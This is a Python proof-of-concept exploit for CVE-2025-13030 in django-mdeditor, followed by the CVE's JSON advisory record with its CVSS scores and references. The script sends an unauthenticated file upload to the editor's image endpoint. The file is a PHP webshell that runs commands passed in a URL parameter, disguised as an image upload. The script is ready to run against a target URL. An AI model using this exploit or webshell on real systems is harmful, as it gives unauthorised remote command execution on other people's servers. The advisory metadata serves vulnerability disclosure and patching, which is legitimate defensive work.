CVE-2025-13030

import requests def exploit(target_url): """ PoC for CVE-2025-13030 Exploits Missing Authentication in django-mdeditor upload endpoint. """ # The vulnerable endpoint typically maps to this URL upload_endpoint = f"{target_url}/mdeditor/uploads/" # Malicious file payload (e.g., a simple webshell) # The vulnerability allows arbitrary extension due to lack of sanitization payload = "<?php system($_GET['cmd']); ?>" # Prepare the file upload files = { 'editormd-image-file': ('exploit.php', payload, 'image/jpeg') } try: # Send POST request without authentication response = requests.post(upload_endpoint, files=files, timeout=10) if response.status_code == 200: print("[+] Success! Server responded:") print(response.text) # If successful, the server might return the URL of the uploaded file else: print(f"[-] Failed with status code: {response.status_code}") except Exception as e: print(f"[-] Error occurred: {e}") if __name__ == "__main__": target = "http://127.0.0.1:8000" exploit(target)

{"cve": {"id": "CVE-2025-13030", "sourceIdentifier": "[email protected]", "published": "2026-04-30T06:16:14.860", "lastModified": "2026-05-05T02:50:07.147", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "All versions of the package django-mdeditor are vulnerable to Missing Authentication for Critical Function in the image upload endpoint. An attacker can upload malicious files and achieve arbitrary code execution since this endpoint lacks authentication protection and proper sanitisation of file names."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "LOW", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pylixm:django-mdeditor:*:*:*:*:*:*:*:*", "matchCriteriaId": "6AE7548A-5629-4855-A5BC-683A06BBBA9F"}]}]}], "references": [{"url": "https://github.com/pylixm/django-mdeditor/blob/e8dd73fb8571ddff2e7a20a4bfa88c376cc33b62/mdeditor/views.py%23L25", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://github.com/pylixm/django-mdeditor/commit/3e80f9edcabc5d2fc136b05a501964b8a5e97cfe", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/pylixm/django-mdeditor/issues/151", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/pylixm/django-mdeditor/pull/185", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://security.snyk.io/vuln/SNYK-PYTHON-DJANGOMDEDITOR-8630926", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}